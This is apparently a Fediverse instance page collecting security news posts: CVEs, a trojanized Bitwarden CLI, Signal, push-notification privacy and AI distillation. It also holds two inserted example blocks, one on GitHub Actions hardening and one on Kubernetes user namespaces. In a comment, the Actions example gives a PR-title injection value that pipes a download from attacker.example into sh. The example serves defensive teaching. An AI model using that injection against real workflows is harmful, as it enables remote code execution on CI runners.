snac.daltux.net is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.
This server runs the snac software and there is no automatic sign-up process.
https://www.heise.de/news/Linux-Distribution-CachyOS-mit-neuer-Software-Verwaltung-11274112.html
CachyOS can now do DNS over HTTPS 👍
"Let us fight for a new world, a decent world that will give men a chance to work, that will give youth a future and old age a security."
Charlie Chaplin
It is a sorry spectacle how some people are instrumentalizing the Signal debate: first it is suggested that Signal is insecure, then "alternatives" are recommended that hardly deserve the name.
Signal was not the weak point here. The weak point was the handling of security-relevant functions.
The attackers did not have to break any encryption. Deceiving people and exploiting processes is enough.
#Signal #Messenger #Security #Sicherheit
/kuk
openSUSE Lands Post-Quantum Hybrid Cryptography in Leap and Tumbleweed https://9to5linux.com/opensuse-lands-post-quantum-hybrid-cryptography-in-leap-and-tumbleweed
Anthropic recorded over 16 million interactions with Claude from about 24,000 fake accounts, which are reportedly linked to Chinese companies trying to cheaply copy the model. Google faced more than 100,000 attempts to copy Gemini. OpenAI reports that most distillation attacks they find come from China. This is not an isolated event. It is a repeatable and scalable strategy.
Breaking the terms of service isn't enough to stop people when the reward is closing a years-long gap in AI technology. The House Select Committee on China wants to label 'adversarial distillation' as industrial espionage under the Economic Espionage Act, which makes sense. At the moment, getting caught just means losing an account. That is hardly a real punishment.
The Trump-Xi summit is approaching, and the White House is reportedly considering sanctions. However, Trump has previously traded away export controls for other deals. If that happens again, AI companies may have to protect their intellectual property by themselves.
When laws fail to keep pace with new types of attacks, attackers automatically have the advantage.
If your company is developing anything unique using advanced AI models, your API access logs are now part of your security risks.
#AI #Cybersecurity #NationalSecurity #IntellectualProperty #Geopolitics #security #privacy #cloud #infosec #Espionage
https://www.thatprivacyguy.com/blog/anthropic-spyware
Security researcher Alexander Hanff wrote an article titled "Anthropic secretly installs spyware when you install Claude Desktop". Anthropic has not denied the report as of the time of this post.
TLDR: If a user installs Claude Desktop on a Mac (PC test results TBA), it installs a backdoor into every browser, even those not installed. By testing on a clean machine, Hanff discovered that installing Claude Desktop for macOS drops a Native Messaging host manifest into multiple Chromium profiles (Chrome, Edge, Brave, Arc, Vivaldi, Opera, Chromium), including for browsers that are not actually installed.
How bad is it? Well... that depends. What it does is create a very wide attack vector, especially for prompt injection. That it is done invisibly, without telling the user, and is difficult to remove, is certainly problematic.
I dunno man, maybe don’t use the planet destroying tulip craze?
RE: https://mastodon.social/@andrewnez/116478133377243019
Workflow security continues to be a common cause of compromises of open source projects.
If you're using GitHub Actions and don't want this to happen to your project: use Zizmor and treat the findings seriously, especially insecure triggers and user-controllable template injections.
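The two finding classes named above, shown side by side in a minimal workflow. This is an added example, not code from the post, from Zizmor, or from any real project; the workflow name, job name and the attacker-controlled PR title are constructed for illustration.

```yaml
# Added example (constructed, not from the post or from Zizmor's documentation).
# Each vulnerable form is left in place as a comment next to its hardened form.
name: pr-triage

# VULNERABLE TRIGGER: pull_request_target runs in the context of the base
# branch with a read/write GITHUB_TOKEN and access to repository secrets,
# even for pull requests opened from forks. Any step that then checks out or
# executes the PR's own code runs fork-controlled code with those privileges.
# on:
#   pull_request_target:

# HARDENED: plain pull_request gives fork PRs a read-only token and no secrets.
on:
  pull_request:
    types: [opened, edited, synchronize]

permissions:
  contents: read        # least privilege for the job token

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      # VULNERABLE (template injection): the ${{ }} expression is expanded into
      # the shell script text BEFORE the shell runs, so a PR title such as
      #   a"; curl https://attacker.example/x | sh; echo "
      # becomes part of the command line and executes on the runner.
      # - run: echo "PR title is ${{ github.event.pull_request.title }}"

      # HARDENED: route untrusted event data through an environment variable.
      # The shell then receives the title as data, not as script source, no
      # matter what characters it contains.
      - name: Echo PR title safely
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'PR title is %s\n' "$PR_TITLE"
```

Running `zizmor .` in a checkout that still contains the commented-out forms would report them under its `dangerous-triggers` and `template-injection` audits; the same env-variable pattern applies to every user-controllable field in the event payload (branch names, commit messages, issue bodies), not just the title.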
pip 26.1 is an incredible release, thank you to the pip maintainers!! 💜
– Relative dependency cooldown support!
– Installing from pylock.toml
– Multiple security fixes
Read the full blog post by @ichard26
https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/
⚠️🔒 According to Telekom Security, "Pack2TheRoot" allows privilege escalation in PackageKit (TOCTOU, CVE-2026-41651, CVSS 8.8). Several standard distros are affected; updating to PackageKit ≥1.3.5 and applying system patches promptly is recommended. https://www.heise.de/news/Pack2TheRoot-Sicherheitsluecke-betrifft-mehrere-Linux-Distributionen-11272897.html #Pack2TheRoot #Linux #Security #PackageKit 🐧
"Pack2TheRoot": security vulnerability affects several Linux distributions
The Telekom security team has discovered the "Pack2TheRoot" vulnerability, which enables privilege escalation in several distributions.
#IT #Linux #LinuxDistribution #Security #Sicherheitslücken #DeutscheTelekom #Updates #news
With Linux user namespaces in Kubernetes I can finally make a few stubborn images (looking at you, #grocy) believe they are running as root, without actual root privileges from the kernel's point of view.
Just set spec.hostUsers=false, done. Finally stable/GA in k8s v1.36.
Small but fine security feature.
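A Pod manifest that opts into the setting described above. This is an added example, not the poster's own manifest; the pod name and the image reference are placeholders.

```yaml
# Added example (constructed): a Pod running in its own user namespace.
apiVersion: v1
kind: Pod
metadata:
  name: grocy-userns                      # name is a placeholder
spec:
  hostUsers: false                        # give the pod its own user namespace
  containers:
    - name: app
      image: example.invalid/grocy:latest # placeholder image reference
      securityContext:
        runAsUser: 0                      # root INSIDE the namespace only
        allowPrivilegeEscalation: false
```

Inside the container, UID 0 is mapped to an unprivileged range on the node, so a process that escapes the container has no root privileges from the host kernel's point of view. You can see the mapping with `kubectl exec grocy-userns -- cat /proc/self/uid_map`: a pod in a user namespace shows an inside-start of 0 mapped to a non-zero host start with a length of 65536, whereas a pod with hostUsers left at its default shows `0 0 4294967295`, the identity mapping. Two caveats: the node's container runtime must support user namespaces (CRI-O, or containerd 2.x), and a pod with `hostUsers: false` cannot also set `hostNetwork`, `hostPID` or `hostIPC`.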
DI.DAY // Digital Tooltime and Networking | Part III
Sunday, May 3 2026 at 4pm.
Kultur im Bunker, Berliner Straße 22C im Viertel, Bremen
Lava will give us an introduction to Delta Chat with a hands-on session to get you started on a secure decentralized messenger. No need for a phone number, no AI or ads, this is just a solid noncommercial messenger with automatic PGP encryption @delta ❤️. Plus there are mini apps.
#diday #duday #decentralized #security #deltachat #networking #bremen
Act Now to Stop #California's Paternalistic & #Privacy-Destroying #SocialMedia Ban
That means all Californians would be required to submit highly sensitive government-issued ID or #biometric info to private companies simply to participate in the modern public square. In the name of "safety," this bill would destroy online #anonymity, expose sensitive personal data to #breach & abuse, & replace parental decision-making with state-mandated #censorship.
#ab1709 #security
@bms48 you wrote:
"… shitcan all involvement with them insofar as that is possible, as they clearly seek to shitcan me and my kind. Late stage capitalism begets the era of the shitcan. #shitcanned"
I edited addresses for The Linux Foundation @linuxfoundation and the Open Source Security Foundation (OpenSSF) @openssf into the opening post.
Since The Linux Foundation is to thank for various improvements to FreeBSD: to what degree, now and in the future, will you shitcan your involvement with the FreeBSD Project?
Below: food for thought. A few points of reference.
Alpha-Omega's partnership with FreeBSD — <https://freebsdfoundation.org/our-donors/donors/?donationType=partners&donationYear=2026>
Why Your Open Source Project Should Prioritize Security: Lessons from FreeBSD’s Proactive Approach | FreeBSD Foundation — <https://freebsdfoundation.org/blog/why-your-open-source-project-should-prioritize-security-lessons-from-freebsds-proactive-approach/> (2024-10-02)
FreeBSD Foundation Releases Bhyve and Capsicum Security Audit Funded by Alpha-Omega Project | FreeBSD Foundation — <https://freebsdfoundation.org/news-and-events/latest-news/freebsd-foundation-releases-bhyve-and-capsicum-security-audit-funded-by-alpha-omega-project/> (2024-11-18)
Strengthening FreeBSD: Addressing Vulnerabilities Through Synacktiv’s Code Audit | FreeBSD Foundation — <https://freebsdfoundation.org/blog/strengthening-freebsd-addressing-vulnerabilities-through-synacktivs-code-audit/> (2024-11-18)
Cleaning Up Critical Infrastructure in FreeBSD | FreeBSD Foundation — <https://freebsdfoundation.org/blog/cleaning-up-critical-infrastructure-in-freebsd/> (2026-04-20)
<https://alpha-omega.dev/grants/grantrecipients/#fws_69ec53f1c42b3>
"… FreeBSD was granted $150,000 for the purpose of improving the security and maintenance of third-party software within the FreeBSD base system."
The mission of Alpha-Omega – a Linux Foundation project – is:
"to protect society by catalyzing sustainable security improvements across open source, from the largest global projects to the smallest but essential components maintained by individuals. "
Further:
"Open source underpins the world’s digital infrastructure, yet much of it remains under-resourced and exposed to growing security risks. Alpha-Omega exists to address this challenge by serving as a helping hand and funding catalyst that supports the maintainers, communities, and ecosystems where security investment can have the greatest impact."
#security #shitcanned #open #source #Linux #FreeBSD #investment #donations #funding
AI/ML Security
<https://openssf.org/groups/ai-ml-security/>
"This working group is situated at the intersection between security and artificial intelligence (AI). We explore the security risks associated with Large Language Models (LLMs), Generative AI (GenAI), and other forms of artificial intelligence and machine learning (ML), and their impact on open source projects, maintainers, their security, communities, and adopters. Furthermore, we explore using AI and ML to strengthen the security of other open source projects.
This group engages in collaborative research and peer organization engagement to explore topics related to AI and security. This includes security for AI development (e.g., supply chain security) but also using AI for security. We are covering risks posed to individuals and organizations by improperly trained models, data poisoning, privacy and secret leakage, prompt injection, licensing, adversarial attacks, and any other similar risks.
This group leverages prior art in the AI/ML space, draws upon both security and AI/ML experts, and pursues collaboration with other communities (such as the CNCF's AI WG, LFAI & Data, AI Alliance, MLCommons, and many others) who are also seeking to research the risks presented by AI/ML to OSS in order to provide guidance, tooling, techniques, and capabilities to support open source projects and their adopters in securely integrating, using, detecting and defending against LLMs. …"
Linux is so "secure" that even the German Telekom comedians manage a crack based on a twelve-year-old bug [archive version, the link goes to an English-language text] when they briefly ask a trained neural network for help. 😁️
#Epic #Fail #Link #Linux #Security #Telekom
Surveillance vendors caught abusing access to telcos to track people's phone locations, researchers say
The Citizen Lab found two separate surveillance vendors abusing the backbone of cellular networks to spy on several victims across the world.
#cybersecurity #diameter #israel #location-tracking #privacy #security #ss7 #surveillance
https://techcrunch.com/2026/04/23/surveillance-vendors-caught-abusing-access-to-telcos-to-track-peoples-phone-locations-researchers-say/
Bitwarden-cli 2026.4.0 compromised. Ugh.
Not something one likes to read in the morning. :(
Password manager Bitwarden: command-line client trojanized
The Bitwarden security team confirms that a malicious version of the command-line client was briefly distributed.
#AmazonWebServices #GitHub #GoogleCloud #IT #Malware #Passwörter #Security #SSH #news
BREAKING! Meshcore team splits over a dispute about AI-generated code disclosure and a hostile trademark takeover.
Meshcore is an off-grid, decentralised mesh radio platform powered by low-cost, public-access LoRa radio technology for reliable, long-range emergency text and embedded sensor communication. It can communicate across kilometres: no towers, no subscriptions, no single point of failure.
https://blog.meshcore.io/2026/04/23/the-split
#meshcore #meshtastic #lora #radio #opensource #foss #drama #privacy #security #selfsovereignty #ai #copyright #takeover
Microsoft issues emergency update for macOS and Linux ASP.NET threat
When authentication fails, things can go very, very wrong.
#asp.net #biz-&-it #microsoft #security #vulnerabilities #windows
https://arstechnica.com/security/2026/04/microsoft-issues-emergency-update-for-macos-and-linux-asp-net-threat/
Vanadium version 148.0.7778.49.0 released:
https://github.com/GrapheneOS/Vanadium/releases/tag/148.0.7778.49.0
See the linked release notes for a summary of the improvements over the previous release and a link to the full changelog.
Forum discussion thread:
https://discuss.grapheneos.org/d/34577-vanadium-version-14807778490-released
We released the #XLibre Xserver 25.0.0.22 and 25.1.4 on Apr 21 containing #security fixes for CVE-2026-33999, CVE-2026-34000, CVE-2026-34001, CVE-2026-34002, and CVE-2026-34003 of the X.Org Server. We recommend everyone update ASAP. #CVE https://github.com/X11Libre/xserver/releases/tag/xlibre-xserver-25.1.4
🔐 Introducing: Unified Attestation
An open-source project for verifying the integrity of Android apps—as an alternative to Google's Play Integrity.
The goal is to make apps such as banking and payment apps usable on independent Android systems without relying on Google services.
We invite developers, ROM projects, and app providers to get involved.
#Volla #VollaOS #OpenSource #software #hardware #Privacy #Security #DeGoogle
Canada Life insurance company suffered a data breach of 5.6 million records of PII belonging to its clients.
www.theglobeandmail.com/business/art...
#security #cybersecurity #databreach #hack #hackers #malware #fuck
Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign, by @sarahgooding (@SocketSecurity):
https://socket.dev/blog/attackers-hunting-high-impact-nodejs-maintainers
W3C is pleased to join the GDC Council in co-organizing the Global Digital Collaboration Conference 2026! This 2nd edition brings together leaders in #DigitalWallets, #VerifiableCredentials, standards, #security and regulation to advance digital trust infrastructure worldwide.
The invitation-only event is co-hosted by intergovernmental, NGO, and open-source organizations. W3C is shaping the program, with team members on site for in-person networking.
🎫 Register now! https://luma.com/1ey4sf2a
Quick thought experiment. Pull out your phone, look at your lock screen, and ask yourself who else is reading those notification previews. The answer is stranger than you think.
EFF just laid out what most people don't realize: push notifications usually route through Apple or Google servers before they hit your device, often with content visible in the clear. Then they get written to a local notification database that doesn't always get wiped when you swipe the alert away or even when you uninstall the app. 404 Media reported the FBI has pulled deleted Signal message text out of that database using standard forensic tools. Signal. The app you installed specifically because you didn't want this.
🔐 Apple and Google now require a court order for push notification data, but Apple's transparency report still shows hundreds of users handed over
📱 Lock screen previews are a free read for anyone who picks up your phone, including at a border crossing or traffic stop
🧹 Uninstalling an app does not guarantee its notification history goes with it, and we don't know what gets backed up to iCloud or Google
🛠️ Signal's notification setting "No Name or Content" is a 30-second fix that closes the easiest leak
For the security folks, this is a useful reminder that end-to-end encryption ends at the endpoint, and the endpoint includes a SQLite file most users have never heard of. For the executives, this is the reason your travel security policy for high-risk regions should say more than "use Signal." The default settings on a stock iPhone leak more than the app you chose to protect you.
https://www.eff.org/deeplinks/2026/04/how-push-notifications-can-betray-your-privacy-and-what-do-about-it
#Privacy #Cybersecurity #MobileSecurity #security #cloud #infosec
GhostBSD 26.1: FreeBSD desktop with XLibre and ZFS snapshots
GhostBSD 26.1 integrates FreeBSD 15.0p2, relies on XLibre, and offers improved hardware support as well as ZFS snapshots.
#Betriebssystem #BSD #FreeBSD #IT #Linux #OpenSource #Security #Wayland #Xfce #news
An ex-Azure engineer published six essays arguing Microsoft's cloud has been on life support since 2008, and the cause isn't bad code. It's bad people decisions. Rushed launch, post-launch talent exodus, no testing discipline, no architectural vision. Sound familiar to anyone who's worked in a place that ships first and staffs later?
Now layer 2026 on top. Microsoft cut roughly 15,000 jobs in mid-2025. Coding agents are pumping out 4x more commits in 90 days. GitHub's unofficial uptime has slipped under 90% and the proposed fix is, wait for it, moving more of GitHub onto Azure. The same Azure the engineer says is held together with rushed decisions and wishful thinking.
🧠 The phrase that stuck with me is "knowledge dilution from high attrition." When the senior people who knew why a system was built that way leave, no LLM in the world can recover that context
🤖 More AI-written code does not mean less work. It means more code to review, test, deploy, and run, which means more compute and more humans needed downstream
📉 OpenAI signing an $11.9B compute deal with CoreWeave in March 2025 was the loudest "we don't trust your capacity" signal Microsoft has ever received from its closest partner
🪑 The bet that AI lets you cut headcount keeps colliding with the reality that AI generates work for humans faster than it removes it
Every CIO I talk to is being pitched the same dream: fewer engineers, more agents, lower run rate. The Azure story is what happens when that math doesn't pencil out and the bill comes due in incidents instead of dollars.
https://www.theregister.com/2026/04/04/azure_talent_exodus/
#Azure #AI #Leadership #security #privacy #cloud #infosec #cybersecurity #software #devops
OpenBSD 7.8 // SLAACD // ERRATA 033
Date: April 21, 2026
Name: 033_slaacd.patch
Description: slaacd(8) could crash due to buffer overflow.
Link: https://cdn.openbsd.org/pub/OpenBSD/patches/7.8/common/033_slaacd.patch.sig
🔒 New release: “Internet.nl now tests on the latest @NCSC_NL TLS guidelines”
➡️ https://en.internet.nl/article/release-1.11/
❓ Are your web and mailservers ready for future-proof TLS?
🌐 Keeping your configuration up-to-date makes the internet more secure.
🚀 Have fun testing and improving if needed!
#tech #dev #security #cybersecurity #InfoSec #Vercel #breach #OAuth #AI
Google blocked more than 8 billion ads in 2025 with the help of AI
Billions of ads stopped, tens of millions of fraudulent user accounts suspended. Google did that with its Gemini AI.
heise+ | Little Snitch for Linux: monitor and control network traffic
Which programs phone home? Little Snitch for Linux not only answers that question but also blocks unwanted connections with a single click.
#ArchLinux #Datenschutz #Debian #Firewall #IT #Linux #Security #Ubuntu #news
@nixCraft I'm seeing a lot of comments about #EU #GDPR & Right to be Forgotten, However to train its #AI #Atlassian either uses metadata (by definition no identifier, things like story points & tasks classes), or in-app data (think: comments), where it will "remove direct identifiers, aggregate data, and apply protections before using it for training". So in a nutshell, GDPR not applicable and in theory, no additional #security risk. Issues around #IP & #copyright remain wide open.
OpenBSD -current is now "7.9-current" https://www.undeadly.org/cgi?action=article;sid=20260420053238 #openbsd #development #current #newrelease #security #freesoftware #libresoftware
@JulianOliver I've run 2 with @openrightsgroup and #no2id in #Manchester too: https://cryptoparty-mcr.org/
XOrg Server 21.1.22 and #Xwayland 24.1.10 Released to Patch Multiple #Security Vulnerabilities https://9to5linux.com/xorg-server-21-1-22-and-xwayland-24-1-10-released-with-multiple-security-fixes
#OpenSSL 4.0 Released with Support for Encrypted Client Hello, SNMP KDF, and More https://9to5linux.com/openssl-4-0-released-with-support-for-encrypted-client-hello-snmp-kdf-and-more